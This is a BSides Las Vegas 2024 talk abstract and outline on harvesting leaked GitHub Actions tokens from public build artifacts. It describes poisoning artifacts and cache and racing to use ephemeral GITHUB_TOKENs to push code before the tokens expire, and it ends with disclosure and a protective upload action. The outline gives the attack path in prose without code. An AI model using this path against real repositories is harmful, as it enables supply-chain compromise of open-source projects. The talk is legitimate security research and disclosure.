Security Bsides Las Vegas 2024

login

Raiders of the Lost Artifacts: Racing for Hidden Treasures in Public GitHub Repositories
.ical
2024-08-06 , Florentine F

Open-source projects often leverage GitHub Actions for automated builds. This talk delves into a novel attack vector where I discovered a treasure trove of secrets – leaked access tokens – hidden within seemingly innocuous build artifacts, available for everyone to consume. These tokens encompassed various cloud services, interesting in their own right, but I aimed to achieve more: taking control over these open-source projects.
Finding hidden GitHub Actions tokens in these artifacts was the easy part, and I even managed to poison the projects’ artifacts and cache, but pushing malicious code into the repositories failed, as the ephemeral tokens created in each workflow run expired as soon as the job was finished. This presented a thrilling challenge: a race against time to steal and use these tokens before they vanish.
This session equips attackers with a novel attack path, revealing how to unearth sensitive data in build artifacts, craft a high-speed exploit to catch ephemeral tokens, and utilize them for swift attacks. In this talk, I’ll showcase real-world examples of popular open-source projects I got to breach, as well as projects maintained by high-profile organizations.

  1. Introduction - 3 Mins
    a. GitHub Actions in a nutshell.
    b. GitHub Actions build artifacts allow to persist data after a job has completed, and share that data with another job in the same workflow.
    These artifacts can include items like test results, build outputs, binaries and log files.
  2. Some open-source projects upload build artifacts, which are always publicly accessible. It’s a completely overlooked area, And these artifacts tend to contain secrets used in the CI pipeline execution. We can scan the artifacts for these leaked secrets. 1 Mins
  3. Showcase various secrets found in open-source projects for various cloud services, such as Last.fm and Digital Ocean. While secrets are always interesting on their own, it wasn’t enough - as I wanted to take complete control over these open-source projects. - 1 Mins
  4. Two common secrets found in these publicly available artifacts are - 3 Mins ACTIONS_RUNTIME_TOKEN and GITHUB_TOKEN. Starting with the former:
    a. Short intro on ACTIONS_RUNTIME_TOKEN:  short-lived authentication token used by GitHub Actions workflows for interacting with GitHub Actions Cache & Artifacts mechanisms.
    b. How I managed to poison workflow artifacts of open-source projects using this token. These poisoned artifacts are executed by other pipeline jobs in the repository, and on developers’ machines. The poisoned cache is used by other jobs, and future executions of the current pipeline.
    c. Show a recording of how I poisoned an artifact uploaded by a pipeline of a popular open-source project (SchemaCrawler) with a malicious version of my own.
  5. Moving on to the main course, dealing with the GITHUB_TOKEN challenges. A short intro on GITHUB_TOKEN: A special, ephemeral access token automatically created in each pipeline job, and expires when the job finishes. GITHUB_TOKEN has permissions against the repository, like pushing code or uploading packages. 1 Min
  6. Cover two main patterns I’ve observed in the wild where GitHub access tokens end up in artifacts. 3 Mins
    a. GitHub users unnoticeably upload their .git folder to as part of a public artifact.
    The .git folder is configured  with a GITHUB_TOKEN since the popular GitHub action, actions/checkout, persists credentials on disk by default.
    b. Super-linter is a popular linter maintained both independently and by GitHub, but it happens to print all environment variables by default to its log. Unaware maintainers often upload super-linter logs as public artifacts.
  7. The challenge: Every good research needs some degree of luck. Why did my research come to a halt, and how it was fast-tracked by the GitHub gods? When scanning the artifacts, I found lots of GITHUB_TOKENs. Thing is, these tokens expire immediately as the workflow job is complete. In parallel, the GitHub action responsible to upload artifacts (upload-artifacts@v3) completes uploading the artifact only when the entire workflow is done, after all jobs end. This created an impossible mission for me, since I could always put my hands on the token only when it’s already invalidated. That got me stuck. 1 Min
  8. The plot changes: During my research, GitHub announced the newest version of the action: upload-artifacts@v4. The update provided a much faster upload, which made lots of projects upgrade their version in use. But the important change relevant for my research was that from this version, artifacts are made available for download as soon as they are uploaded without having to wait for the job to end.
  9. The race: pwning a GitHub repo before the GITHUB_TOKEN expires. This is the main part of the talk, where I show the full attack path. - 3 Mins
    a. Scanned thousands of public GitHub repositories that use GitHub Actions and upload artifacts, downloaded these artifacts, and scanned them for secrets.
    b. When a GITHUB_TOKEN is found: Stalk the project, and wait for a workflow run to start.
    c. Once the workflow starts, constantly check for an artifact upload. When it’s available, download it and extract the GITHUB_TOKEN, and use it to push malicious code to the repository, all that - before the job ends (In the vulnerable open-source projects I found, I simply created a new branch for demonstration, which requires write permission in the token as well).
    d. Building a fully automated hacking setup, using... GitHub Actions: Explain why I’ve chosen GitHub Actions as an offensive infrastructure to do the dirty work, as it reduced latency (bringing me closer to the attack destination), it’s triggerable via API, and it already contains caballities I needed that are implemented in GitHub Actions.
  10. Show a recorded demo of an attack against the highly-popular quay/clair repository (>10k stars), maintained by RedHat. - 2 Mins
  11. I don’t like to lose. How I’ve managed to win more & more races: Cover what preconditions I had to meet to win the race, and how I managed to overcome them by further enhancing the exploit infrastructure. For example, the optimization process includes sending a multitude of requests per second while removing HTTP headers and SSL verification.
  12. Review disclosed open-source projects: Google, AWS, Red Hat, OWASP, and more. - 1 Min
  13. Release a new GitHub action that wraps the native upload-artifacts GitHub action, while safeguarding against accidental secret leaks. It performs pre-upload checks to identify and prevent the upload of artifacts with secrets.
  14. Summary - 1 Min
The speaker’s profile picture
Yaron Avital

Yaron Avital is a seasoned professional with a diverse background in the technology and cybersecurity fields. Yaron's career has spanned over 15 years in the private sector as a software engineer and team lead at global companies and startups.
Driven by a passion for cybersecurity, Yaron now focuses on security research, With expertise in application security, software supply chain security, web security research, and 3rd party protocols reversing.